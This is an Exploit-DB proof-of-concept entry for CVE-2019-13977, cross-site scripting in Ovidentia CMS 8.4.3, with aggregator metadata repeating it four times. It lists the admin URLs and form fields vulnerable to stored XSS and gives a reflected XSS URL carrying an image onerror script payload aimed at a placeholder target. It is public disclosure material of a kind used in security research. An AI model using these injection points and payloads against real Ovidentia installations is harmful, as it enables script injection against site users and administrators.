ID EDB-ID:47159
Type exploitdb
Reporter Exploit-DB
Modified 2019-07-25T00:00:00
Description
#-------------------------------------------------------
# Exploit Title: [ Ovidentia CMS - XSS Ovidentia 8.4.3 ]
# Description: [ The vulnerability permits any kind of XSS attacks. Reflected, DOM and Stored XSS. ]
# Date: [ 06/05/2019 ]
# CVE: [ CVE-2019-13977 ]
# Exploit Author:
# [ Fernando Pinheiro (n3k00n3) ]
# [ Victor Flores (UserX) ]
# Vendor Homepage: [
https://www.ovidentia.org/
]
# Version: [ 8.4.3 ]
# Tested on: [ Mac,linux - Firefox, safari ]
# Download: [
http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
]
#
# [ Kitsun3Sec Research Group ]
#--------------------------------------------------------
POC
>========================================================
Stored XSS
>========================================================
1. POST
http://TARGET/ovidentia/index.php?tg=groups
Field:
nom
2. POST
http://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y
Fields:
Nom
Description
3. GET
http://TARGET/ovidentia/index.php?tg=delegat
Show groups
4. POST
http://TARGET/ovidentia/index.php?tg=site&idx=create
http://TARGET/ovidentia/index.php?tg=site&item=4
Fields:
Nom
address
description
5. POST
http://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1
Fields:
Libellé du champ
Explosion:
http://TARGET/ovidentia/index.php?tg=forums&idx=notices
http://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1
http://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1
6. POST
http://TARGET/ovidentia/index.php?tg=notes&idx=Create
Fields: Notes
Explosion:
http://TARGET/ovidentia/index.php?tg=notes&idx=List
7. POST
http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add
Fields: all
Explosion:
http://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2
>========================================================
REFLECTED
>========================================================
1. GET
http://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E
Sent from [ProtonMail](https://protonmail.com), encrypted email based in Switzerland.
{"id": "EDB-ID:47159", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Ovidentia 8.4.3 - Cross-Site Scripting", "description": "", "published": "2019-07-25T00:00:00", "modified": "2019-07-25T00:00:00", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "href": "https://www.exploit-db.com/exploits/47159", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2019-13977"], "lastseen": "2019-07-25T08:50:57", "viewCount": 85, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-13977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153737"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:7E70DF83AC93F5019AB0E03437DA7DC7"]}, {"type": "zdt", "idList": ["1337DAY-ID-33023"]}], "modified": "2019-07-25T08:50:57", "rev": 2}, "score": {"value": 3.8, "vector": "NONE", "modified": "2019-07-25T08:50:57", "rev": 2}, "vulnersScore": 3.8}, "sourceHref": "https://www.exploit-db.com/download/47159", "sourceData": "#-------------------------------------------------------\r\n# Exploit Title: [ Ovidentia CMS - XSS Ovidentia 8.4.3 ]\r\n# Description: [ The vulnerability permits any kind of XSS attacks. Reflected, DOM and Stored XSS. ]\r\n# Date: [ 06/05/2019 ]\r\n# CVE: [ CVE-2019-13977 ]\r\n# Exploit Author:\r\n# [ Fernando Pinheiro (n3k00n3) ]\r\n# [ Victor Flores\t(UserX) ]\r\n# Vendor Homepage: [\r\nhttps://www.ovidentia.org/\r\n]\r\n# Version: [ 8.4.3 ]\r\n# Tested on: [ Mac,linux - Firefox, safari ]\r\n# Download: [\r\nhttp://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893\r\n]\r\n#\r\n# [ Kitsun3Sec Research Group ]\r\n#--------------------------------------------------------\r\n\r\nPOC\r\n\r\n>========================================================\r\n Stored XSS\r\n>========================================================\r\n\r\n1. POST\r\nhttp://TARGET/ovidentia/index.php?tg=groups\r\nField:\r\n\t\tnom\r\n2. POST\r\nhttp://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y\r\nFields:\r\n\t\tNom\r\n\t\tDescription\r\n3. GET\r\nhttp://TARGET/ovidentia/index.php?tg=delegat\r\nShow groups\r\n4. POST\r\nhttp://TARGET/ovidentia/index.php?tg=site&idx=create\r\n\r\nhttp://TARGET/ovidentia/index.php?tg=site&item=4\r\nFields:\r\n\t\tNom\r\n\t\taddress\r\n\t\tdescription\r\n5. POST\r\nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1\r\nFields:\r\n\t\tLibell\u00e9 du champ\r\n\tExplosion:\r\nhttp://TARGET/ovidentia/index.php?tg=forums&idx=notices\r\n\r\nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1\r\n\r\nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1\r\n6. POST\r\nhttp://TARGET/ovidentia/index.php?tg=notes&idx=Create\r\nFields: Notes\r\n\tExplosion:\r\nhttp://TARGET/ovidentia/index.php?tg=notes&idx=List\r\n7. POST\r\nhttp://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add\r\nFields: all\r\n\tExplosion:\r\nhttp://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2\r\n>========================================================\r\n REFLECTED\r\n>========================================================\r\n\r\n1. GET\r\nhttp://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E\r\n\r\nSent from [ProtonMail](https://protonmail.com), encrypted email based in Switzerland.", "osvdbidlist": []}
{"cve": [{"lastseen": "2020-10-03T13:38:42", "description": "index.php in Ovidentia 8.4.3 has XSS via tg=groups, tg=maildoms&idx=create&userid=0&bgrp=y, tg=delegat, tg=site&idx=create, tg=site&item=4, tg=admdir&idx=mdb&id=1, tg=notes&idx=Create, tg=admfaqs&idx=Add, or tg=admoc&idx=addoc&item=.", "edition": 4, "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 5.4, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-07-19T07:15:00", "title": "CVE-2019-13977", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13977"], "modified": "2019-07-27T17:15:00", "cpe": ["cpe:/a:ovidentia:ovidentia:8.4.3"], "id": "CVE-2019-13977", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13977", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ovidentia:ovidentia:8.4.3:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2019-12-04T07:43:11", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2019-07-25T00:00:00", "title": "Ovidentia 8.4.3 - Cross-Site Scripting Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-13977"], "modified": "2019-07-25T00:00:00", "id": "1337DAY-ID-33023", "href": "https://0day.today/exploit/description/33023", "sourceData": "#-------------------------------------------------------\r\n# Exploit Title: [ Ovidentia CMS - XSS Ovidentia 8.4.3 ]\r\n# Description: [ The vulnerability permits any kind of XSS attacks. Reflected, DOM and Stored XSS. ]\r\n# CVE: [ CVE-2019-13977 ]\r\n# Exploit Author:\r\n# [ Fernando Pinheiro (n3k00n3) ]\r\n# [ Victor Flores\t(UserX) ]\r\n# Vendor Homepage: [\r\nhttps://www.ovidentia.org/\r\n]\r\n# Version: [ 8.4.3 ]\r\n# Tested on: [ Mac,linux - Firefox, safari ]\r\n# Download: [\r\nhttp://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893\r\n]\r\n#\r\n# [ Kitsun3Sec Research Group ]\r\n#--------------------------------------------------------\r\n\r\nPOC\r\n\r\n>========================================================\r\n Stored XSS\r\n>========================================================\r\n\r\n1. POST\r\nhttp://TARGET/ovidentia/index.php?tg=groups\r\nField:\r\n\t\tnom\r\n2. POST\r\nhttp://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y\r\nFields:\r\n\t\tNom\r\n\t\tDescription\r\n3. GET\r\nhttp://TARGET/ovidentia/index.php?tg=delegat\r\nShow groups\r\n4. POST\r\nhttp://TARGET/ovidentia/index.php?tg=site&idx=create\r\n\r\nhttp://TARGET/ovidentia/index.php?tg=site&item=4\r\nFields:\r\n\t\tNom\r\n\t\taddress\r\n\t\tdescription\r\n5. POST\r\nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1\r\nFields:\r\n\t\tLibell\u00e9 du champ\r\n\tExplosion:\r\nhttp://TARGET/ovidentia/index.php?tg=forums&idx=notices\r\n\r\nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1\r\n\r\nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1\r\n6. POST\r\nhttp://TARGET/ovidentia/index.php?tg=notes&idx=Create\r\nFields: Notes\r\n\tExplosion:\r\nhttp://TARGET/ovidentia/index.php?tg=notes&idx=List\r\n7. POST\r\nhttp://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add\r\nFields: all\r\n\tExplosion:\r\nhttp://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2\r\n>========================================================\r\n REFLECTED\r\n>========================================================\r\n\r\n1. GET\r\nhttp://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E\r\n\r\nSent from [ProtonMail](https://protonmail.com), encrypted email based in Switzerland.\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "sourceHref": "https://0day.today/exploit/33023"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:40", "description": "\nOvidentia 8.4.3 - Cross-Site Scripting", "edition": 1, "published": "2019-07-25T00:00:00", "title": "Ovidentia 8.4.3 - Cross-Site Scripting", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-13977"], "modified": "2019-07-25T00:00:00", "id": "EXPLOITPACK:7E70DF83AC93F5019AB0E03437DA7DC7", "href": "", "sourceData": "#-------------------------------------------------------\n# Exploit Title: [ Ovidentia CMS - XSS Ovidentia 8.4.3 ]\n# Description: [ The vulnerability permits any kind of XSS attacks. Reflected, DOM and Stored XSS. ]\n# Date: [ 06/05/2019 ]\n# CVE: [ CVE-2019-13977 ]\n# Exploit Author:\n# [ Fernando Pinheiro (n3k00n3) ]\n# [ Victor Flores\t(UserX) ]\n# Vendor Homepage: [\nhttps://www.ovidentia.org/\n]\n# Version: [ 8.4.3 ]\n# Tested on: [ Mac,linux - Firefox, safari ]\n# Download: [\nhttp://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893\n]\n#\n# [ Kitsun3Sec Research Group ]\n#--------------------------------------------------------\n\nPOC\n\n>========================================================\n Stored XSS\n>========================================================\n\n1. POST\nhttp://TARGET/ovidentia/index.php?tg=groups\nField:\n\t\tnom\n2. POST\nhttp://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y\nFields:\n\t\tNom\n\t\tDescription\n3. GET\nhttp://TARGET/ovidentia/index.php?tg=delegat\nShow groups\n4. POST\nhttp://TARGET/ovidentia/index.php?tg=site&idx=create\n\nhttp://TARGET/ovidentia/index.php?tg=site&item=4\nFields:\n\t\tNom\n\t\taddress\n\t\tdescription\n5. POST\nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1\nFields:\n\t\tLibell\u00e9 du champ\n\tExplosion:\nhttp://TARGET/ovidentia/index.php?tg=forums&idx=notices\n\nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1\n\nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1\n6. POST\nhttp://TARGET/ovidentia/index.php?tg=notes&idx=Create\nFields: Notes\n\tExplosion:\nhttp://TARGET/ovidentia/index.php?tg=notes&idx=List\n7. POST\nhttp://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add\nFields: all\n\tExplosion:\nhttp://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2\n>========================================================\n REFLECTED\n>========================================================\n\n1. GET\nhttp://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E\n\nSent from [ProtonMail](https://protonmail.com), encrypted email based in Switzerland.", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2019-07-27T21:05:36", "description": "", "published": "2019-07-24T00:00:00", "type": "packetstorm", "title": "Ovidentia 8.4.3 Cross Site Scripting", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-13977"], "modified": "2019-07-24T00:00:00", "id": "PACKETSTORM:153737", "href": "https://packetstormsecurity.com/files/153737/Ovidentia-8.4.3-Cross-Site-Scripting.html", "sourceData": "`#------------------------------------------------------- \n# Exploit Title: [ Ovidentia CMS - XSS Ovidentia 8.4.3 ] \n# Description: [ The vulnerability permits any kind of XSS attacks. Reflected, DOM and Stored XSS. ] \n# Date: [ 06/05/2019 ] \n# CVE: [ CVE-2019-13977 ] \n# Exploit Author: \n# [ Fernando Pinheiro (n3k00n3) ] \n# [ Victor Flores (UserX) ] \n# Vendor Homepage: [ \nhttps://www.ovidentia.org/ \n] \n# Version: [ 8.4.3 ] \n# Tested on: [ Mac,linux - Firefox, safari ] \n# Download: [ \nhttp://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893 \n] \n# \n# [ Kitsun3Sec Research Group ] \n#-------------------------------------------------------- \n \nPOC \n \n>======================================================== \nStored XSS \n>======================================================== \n \n1. POST \nhttp://TARGET/ovidentia/index.php?tg=groups \nField: \nnom \n2. POST \nhttp://TARGET/ovidentia/index.php?tg=maildoms&idx=create&userid=0&bgrp=y \nFields: \nNom \nDescription \n3. GET \nhttp://TARGET/ovidentia/index.php?tg=delegat \nShow groups \n4. POST \nhttp://TARGET/ovidentia/index.php?tg=site&idx=create \n \nhttp://TARGET/ovidentia/index.php?tg=site&item=4 \nFields: \nNom \naddress \ndescription \n5. POST \nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=mdb&id=1 \nFields: \nLibell\u00e9 du champ \nExplosion: \nhttp://TARGET/ovidentia/index.php?tg=forums&idx=notices \n \nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=dispdb&id=1 \n \nhttp://TARGET/ovidentia/index.php?tg=admdir&idx=lorddb&id=1 \n6. POST \nhttp://TARGET/ovidentia/index.php?tg=notes&idx=Create \nFields: Notes \nExplosion: \nhttp://TARGET/ovidentia/index.php?tg=notes&idx=List \n7. POST \nhttp://TARGET/ovidentia/index.php?tg=admfaqs&idx=Add \nFields: all \nExplosion: \nhttp://TARGET/ovidentia/index.php?tg=admfaqs&idx=Categories#bab_faq_2 \n>======================================================== \nREFLECTED \n>======================================================== \n \n1. GET \nhttp://TARGET/ovidentia/index.php?tg=admoc&idx=addoc&item=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E \n \nSent from [ProtonMail](https://protonmail.com), encrypted email based in Switzerland. \n`\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "sourceHref": "https://packetstormsecurity.com/files/download/153737/ovidentia843-xss.txt"}]}
